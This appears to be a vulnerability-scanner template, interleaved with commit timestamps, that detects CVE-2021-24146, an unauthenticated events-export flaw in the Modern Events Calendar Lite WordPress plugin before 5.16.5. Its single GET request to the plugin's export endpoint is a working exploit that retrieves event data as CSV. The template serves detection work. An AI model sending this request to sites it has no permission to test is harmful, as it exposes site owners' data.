2021-04-23 03:17:52 +00:00
id : CVE-2021-24146
2021-04-22 19:15:52 +00:00
info :
name : Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export
2021-04-23 03:17:52 +00:00
description : Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.
2021-04-22 19:15:52 +00:00
author : random_robbie
2021-04-23 03:17:52 +00:00
severity : high
2021-04-23 03:08:45 +00:00
reference : https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
2021-04-23 03:20:02 +00:00
tags : wordpress,wp-plugin,cve,cve2021
2021-04-22 19:15:52 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"
matchers-condition : and
matchers :
- type : word
words :
- "mec-events"
2021-06-17 01:16:54 +00:00
- "text/csv"
condition : and
2021-04-22 19:15:52 +00:00
part : header
2021-04-23 03:08:45 +00:00
2021-04-22 19:15:52 +00:00
- type : status
status :
- 200